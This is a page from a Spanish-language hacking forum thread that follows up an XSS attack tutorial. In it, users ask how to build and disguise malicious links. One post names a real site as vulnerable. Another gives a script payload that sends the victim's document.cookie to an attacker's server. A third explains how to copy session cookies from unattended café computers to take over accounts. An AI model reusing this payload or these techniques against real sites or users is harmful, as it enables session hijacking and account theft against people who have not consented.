elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 [3] 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 148,423 veces)
joanikus

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #20 en: 18 Agosto 2005, 18:06 pm »

okey gracias por el tuto pero yo lo poongo en un buscadoir e nuke et y me da error eso se considera aletra¿


En línea

Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.164


La paciencia es la madre de la ciencia.


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #21 en: 18 Agosto 2005, 18:37 pm »

Ni me acordaba de este tutorial xD


Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código:
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>


Salu2.


En este caso no hay ningún botón. Hay un enlace que llama a una función de javascript llamada submit().
Mira el código fuente de esa función a ver si puedes sacar algo :)

P.D: Recuerdo que esto es solo un pequeño texto de introducción :)
Y que ya cada vez hay menos webs con este error. Parece que estamos aprendiendo a programar xDD


En línea

Firmado.
joanikus

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #22 en: 20 Agosto 2005, 13:02 pm »

eyy muxas gracias por el tuto pero una cosilla esa url maligna se puede camuflar con un .tk o .cjb.net??? gracias
En línea

Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.164


La paciencia es la madre de la ciencia.


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #23 en: 20 Agosto 2005, 14:31 pm »

Pues upongo que si. Pero si no recuerdo mal ahora en TK te teine 15 segundo(o hasta que pulses un enlace) en una pagina promocinal. No creo que eso sea uy creible...bueno, es cuestión de probar.
En línea

Firmado.
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #24 en: 1 Septiembre 2005, 16:49 pm »

una web vulnerable a este tipo de atake es:

www.programas-gratis.net

si no m ekivoco, pero yo como soy una buena niña, m comporto y no ataco lo primero q es vulnerable...
En línea

sirdarckcat
Aspirante a supervillano
Colaborador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #25 en: 6 Agosto 2006, 09:38 am »

@Torocatala:
prohibido dar informacion de terceros.
En línea

satan69


Desconectado Desconectado

Mensajes: 341



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #26 en: 7 Agosto 2006, 07:07 am »

mi pregunta es si no hay en el red una pagina para pasar de accsi a hexadecimales.. asi es mas rapido porque encontre una web vulnerable.. jijijiji ;D ;D ;D
En línea

Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.322


Peace & Love


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #27 en: 7 Agosto 2006, 07:11 am »

http://www.elhacker.net/sneak.php
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
satan69


Desconectado Desconectado

Mensajes: 341



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #28 en: 7 Agosto 2006, 07:16 am »


gracias.. ;D ;D


ademas de eso quiero que me ayuden hacer un link maligno..


Código:
                  <td align="center"><p>Buscar Blogs</p></td>
                </tr>
                <tr>
                  <td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
                </tr>
                <tr>
                  <td align="center"><input name="submit" type="submit" value="Buscar" /><

http://www.victima.com/?Keyword=<script>window.location='http://server/cookies.php?cookie='+document.cookie;</script>&buscar=;


la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir
« Última modificación: 7 Agosto 2006, 07:58 am por satan69 » En línea

frankener1986

Desconectado Desconectado

Mensajes: 136


Reversing the world


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #29 en: 4 Septiembre 2006, 22:49 pm »

Otra manera es irse a un ciber, y mirar a alguno que este en una pagina la cual te gustaria tener su cuenta... con un poco de suerte, si cierra la ventana del explorador sin hacer logout, vas al explorador en el que estaba, le das a ver las cookies, buscas el nombre de la pagina, y te las apuntas las dos (o puede que alguna mas, suelen ser user y password), y luego, en tu casa, creas las cookies que copiaste en aquel papel... y listo.. y si la pagina no pide confirmacion de contraseña actual para cambiarle el password, hasta podras hacerlo xD     
En línea

Páginas: 1 2 [3] 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
OceanLotus APT usa el RAT Ratsnif en sus ataques
Noticias
wolfbcn 0 1,182 Último mensaje 3 Julio 2019, 02:07 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines